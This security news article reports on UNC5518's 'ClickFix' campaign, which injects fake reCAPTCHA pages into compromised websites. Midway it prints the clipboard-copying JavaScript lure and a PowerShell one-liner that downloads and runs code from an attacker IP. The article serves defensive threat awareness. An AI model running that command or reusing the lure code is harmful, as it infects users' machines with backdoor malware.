A sophisticated cybercrime operation has emerged, targeting unsuspecting internet users through a deceptive social engineering technique that exploits one of the web’s most trusted security mechanisms.
Since June 2024, the financially motivated threat group UNC5518 has been systematically compromising legitimate websites to inject malicious fake CAPTCHA verification pages, tricking visitors into unknowingly executing malware on their systems.
The attack campaign, dubbed “ClickFix” by security researchers, represents a particularly insidious form of social engineering that leverages users’ familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they are presented with what appears to be a standard reCAPTCHA interface, complete with the familiar “I’m not a robot” checkbox and Google branding.
However, clicking on this seemingly innocuous element triggers a malicious JavaScript payload that automatically copies a PowerShell command to the user’s clipboard.
Google Cloud analysts identified that UNC5518 operates as an access-as-a-service provider, partnering with multiple affiliate threat groups to monetize their initial compromise capabilities.
The group’s sophisticated infrastructure supports various downstream actors, including UNC5774, which specializes in deploying the CORNFLAKE.V3 backdoor, and UNC4108, known for utilizing PowerShell-based tools and conducting extensive network reconnaissance.
.webp "UNC5518 Group Hacks Legitimate Websites to Inject Fake Captcha That Tricks Users to Execute Malware 3")
The technical execution of this attack demonstrates remarkable attention to detail in mimicking legitimate web security practices.
The malicious JavaScript embedded within compromised websites creates a convincing CAPTCHA interface using code that closely resembles authentic Google reCAPTCHA implementations.
When victims interact with the fake verification system, the following code executes silently in the background:-
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document[.]execCommand("copy");This script automatically copies a carefully crafted PowerShell command to the victim’s clipboard, which appears as: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex".
The command is designed to download and execute additional malware payloads from attacker-controlled infrastructure.
Infection Mechanism and Payload Delivery
The ClickFix technique exploits a critical weakness in user behavior patterns, capitalizing on the widespread acceptance and trust associated with CAPTCHA systems.
Once the malicious PowerShell command is copied to the clipboard, victims are typically instructed through on-screen prompts to paste and execute the command using the Windows Run dialog (Windows+R), believing they are completing a legitimate verification process.
Upon execution, the PowerShell script initiates a sophisticated multi-stage infection chain that includes comprehensive anti-analysis measures.
The malware performs environment checks to detect virtual machines and sandboxes, examining system memory configurations and manufacturer information to evade security research environments.
If these checks pass, the script downloads Node.js runtime components from legitimate sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent access through registry modifications and enables comprehensive system reconnaissance activities including Active Directory enumeration and Kerberoasting credential harvesting techniques.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
